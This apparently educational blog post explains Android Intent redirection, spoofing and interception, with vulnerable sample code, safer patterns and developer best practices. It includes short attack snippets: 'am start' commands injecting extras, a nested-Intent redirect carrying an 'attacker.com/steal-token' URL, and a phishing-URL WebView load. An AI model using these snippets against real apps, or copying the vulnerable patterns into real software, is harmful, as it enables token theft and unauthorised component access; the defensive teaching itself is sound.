Securing Android Intents: Redirection, Spoofing & Interception

Android applications use Intents to communicate between components such as Activities, Services, and Broadcast Receivers. While this mechanism simplifies inter-component messaging, it also opens up potential attack vectors, especially when components are improperly exposed or when developers fail to validate incoming Intents. In this blog, we'll dive into three common Intent-based vulnerabilities:

• Intent Redirection
• Intent Spoofing
• Intent Interception

Understanding and mitigating these issues is crucial for anyone developing or auditing Android applications.

1. Intent Redirection

What It Is:

Intent redirection happens when an app receives an Intent and blindly forwards it to a non-exported (protected) component. This allows an attacker to access components that are otherwise inaccessible.

Example:

Suppose an app has:

• MainActivity – exported ( android:exported="true" )
• MainActivity2 – protected ( android:exported="false" )

If MainActivity receives an Intent with extra parameters and passes them directly to MainActivity2 , an attacker can use it as a proxy to reach MainActivity2 .

// Exported Activity
public class MainActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent intent = getIntent();
        intent.setClassName(this, "com.example.intent_vuln.MainActivity2");
        startActivity(intent); // Redirects attacker-supplied extras
    }
}

 am start -n com.example.intent_vuln/.MainActivity --es "id" "123"
    

This can cause MainActivity2 to be launched with the attacker-supplied id.

Safer Pattern:

Intent intent = getIntent();
if (isInternalCall(intent)) {
    Intent safeIntent = new Intent(this, MainActivity2.class);
    safeIntent.putExtra("id", sanitize(intent.getStringExtra("id")));
    startActivity(safeIntent);
} else {

    Log.w("Security", "Rejected untrusted redirect");
}

More Complex Case:

An exported activity accepts a Parcelable extra that contains another Intent. If this inner Intent is used to start a component, it can redirect execution to a protected activity.

Intent intent = new Intent();
 intent.setClassName("com.victim.app", "com.victim.app.ProtectedActivity");
 intent.putExtra("url", "https://attacker.com/steal-token");
 Intent outer = new Intent();
 outer.setClassName("com.victim.app", "com.victim.app.RedirectActivity");
 outer.putExtra("extra_intent", intent);
 startActivity(outer);

If RedirectActivity blindly calls startActivity(getIntent().getParcelableExtra("extra_intent")) , it will launch the protected component.

2. Intent Spoofing

What It Is:

Intent spoofing refers to sending a malicious Intent directly to an exported component in order to trigger unintended behavior.

Example:

An exported activity loads a URL from the Intent extras.:

public class InterceptActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        String url = getIntent().getStringExtra("baseurl");
        webView.loadUrl(url); // Directly loads user-supplied URL
    }
 }

A malicious app can start this activity with its own URL:

am start -n com.victim.app/.InterceptActivity --es baseurl "https://phishing.com"

This results in the WebView loading untrusted content in the victim appʼs context, potentially with elevated permissions, cookies, or access to local storage.

Safer Pattern:

String url = getIntent().getStringExtra("baseurl");
 if (isTrustedDomain(url)) {
    webView.loadUrl(url);
 } else {
    webView.loadUrl("https://default.safe-site.com");
 }

Add android:exported="false" if external access isn't necessary, or protect with a permission:

<activity android:name=".InterceptActivity"
          android:exported="true"
          android:permission="com.victim.app.SAFE_ACCESS"/>

• Always validate and sanitize external input.
• Require permissions for exported components that perform sensitive actions.
• Consider using non-exported components for internal-only operations.

3. Intent Interception

What It Is:

Intent interception occurs when a malicious app hijacks or listens for Intents meant for another component. This can occur through improperly secured deep links or poorly handled startActivityForResult() flows.

Case A: Deep Link Hijacking:

If two apps register the same URL scheme (e.g., myapp://reset-password ), the system may prompt the user to choose which app to handle it. A malicious app can register the same pattern and intercept sensitive links, such as password reset tokens or session IDs.

Case B: startActivityForResult() Pitfalls:

If an app starts an activity for a result:

Intent i = new Intent(this, ResultActivity.class);
 startActivityForResult(i, 100);
 ...and 
ResultActivity
 uses:
Intent data = getIntent();
 setResult(RESULT_OK, data);
 finish();

Then any app can start ResultActivity and inject arbitrary data into the flow. This gives attackers both read and write access to sensitive data.

Safer Pattern:

Use a fresh Intent for results:

Intent result = new Intent();
 result.putExtra("data", sanitize(safeData));
 setResult(RESULT_OK, result);
 

And ensure that only trusted apps/components can start the activity, either by making it non-exported or requiring permissions.

<activity android:name=".ResultActivity" android:exported="false"/>

Best Practices for Developers

To protect against these Intent-based vulnerabilities:  

• Set android:exported="false" by default.
• Only export when necessary.
• Use explicit Intents for internal communication
• Validate all data coming from Intents - even if from another app you trust.
• Apply custom permissions to exported components handling sensitive logic.
• For deep links, implement digital asset links or URI verification.
• Avoid using getIntent() when returning data from startActivityForResult() flows.
• Avoid reusing incoming Intents in setResult() ; create new result Intents.
• Implement Android App Links and enforce host ownership for deep links.

Conclusion

Even components marked as protected can be compromised if other exported components act as conduits or if Intent data is not properly handled. By understanding these three core vulnerability patterns, Redirection, Spoofing, and Interception, developers and security testers can identify weaknesses early and prevent malicious exploitation.

Androidʼs Intent system is powerful, but with that power comes the responsibility to validate, sanitize, and secure every piece of inter-component communication. Don't trust what you haven't verified.